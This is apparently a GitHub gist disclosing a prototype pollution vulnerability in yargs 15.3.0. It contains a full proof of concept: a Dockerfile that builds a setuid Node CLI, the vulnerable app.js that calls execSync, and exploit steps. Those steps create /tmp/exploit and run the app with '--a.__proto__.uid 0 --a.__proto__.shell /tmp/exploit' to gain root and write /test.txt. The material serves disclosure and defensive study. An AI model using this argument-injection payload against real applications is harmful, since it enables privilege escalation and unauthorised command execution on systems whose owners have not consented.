Skip to content

Instantly share code, notes, and snippets.

@Kirill89
Created March 12, 2020 08:36
Show Gist options
  • Save Kirill89/dcd8100d010896157a36624119439832 to your computer and use it in GitHub Desktop.
Save Kirill89/dcd8100d010896157a36624119439832 to your computer and use it in GitHub Desktop.
Prototype Pollution security vulnerability in yargs

Prototype Pollution security vulnerability in yargs

How to run:

  1. npm i
  2. npm run build
  3. npm run start

Definition

Now you are in a sandbox with permissions of just-user. Our goal is to create test.txt at the root of a container. For sure we don't have that permissions.

To validate it let's try to do the following:

echo "test" > /test.txt
bash: /test.txt: Permission denied

Exploit

  1. Create exploit script: printf '#!/bin/sh\necho "test" > /test.txt' > /tmp/exploit
  2. Give it execute permission: chmod +x /tmp/exploit
  3. Run the application: ./app --a.__proto__.uid 0 --a.__proto__.shell /tmp/exploit

To validate run cat /test.txt.

As you can see we have permission violation via vulnerable application.

const argv = require('yargs').argv;
const cp = require('child_process');
if (argv.l) {
console.log(String(cp.execSync('ls -l')));
} else {
console.log(String(cp.execSync('ls /')));
}
FROM ubuntu:18.04
COPY ./app /app
RUN chmod u+s /app
RUN useradd -s /bin/bash just-user
USER just-user
{
"name": "poc",
"version": "1.0.0",
"description": "",
"main": "index.js",
"keywords": [],
"author": "",
"license": "ISC",
"scripts": {
"start": "docker run --rm -it poc bash",
"build": "npm run build:cli && npm run build:docker",
"build:cli": "pkg app.js --target node10-linux-x64",
"build:docker": "docker build . --tag poc"
},
"dependencies": {
"yargs": "15.3.0"
},
"devDependencies": {
"pkg": "4.4.4"
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment